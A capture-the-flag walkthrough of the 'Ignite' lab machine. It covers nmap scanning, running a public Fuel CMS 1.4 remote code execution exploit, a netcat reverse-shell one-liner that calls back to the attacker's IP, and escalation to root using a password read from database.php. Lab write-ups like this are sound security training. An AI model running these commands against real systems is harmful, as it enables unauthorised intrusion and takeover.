Ignite

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.108.60

Detailed Nmap Scan :

Command Breakdown:

• (-sV): Service version

• (-sC): Default nmap scripts

• (-p): Specifying ports 80

• (-oN nmap): Saving it into a files called nmap

nmap -sC -sV -p 80 -oN nmap 10.10.101.147

Enumeration

Lets visit the website

Its a guide on how to use Fuel CMS. In the nmap scan we saw a hidden directory called /fuel, lets visit that. It redirects us to this page.

Its a login page. At the moment we do not have credentials, so we cannot login. Lets go to searchsploit and search for exploits on this version of fuel CMS.

searchsploit fuel cms 1.4

We can see that there are two Remote code execution vulnerabilities, lets use one of them to exploit this machine. Lets copy this exploit to our directory.

searchsploit -m linux/webapps/47138.py

Looking through the exploit , we need to change the URL to the URL of the machine we are attacking.

After changing it, I ran the exploit.

python 47138.py

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f

Make sure to change the IP and start a netcat listener.

nc -lvnp 1234

Before running the command, lets remove all the unnecessary code in the exploit so that we do not get any errors if something that is not of our concern does not work.

Now lets run the command and run the reverse shell command, we get a shell.

Now we can read the flag.txt file.

Privilege Escalation

After looking around for a while, I went into the /var/www/html/fuel/application/config directory as config files are always interesting. One file that looked very interesting to me was the database.php file as I thought that I can find usernames and password in it.

cat database.php

And I did find the root password.

Now time to switch users to root.

su root

And we are now root, we can go read the root.txt flag.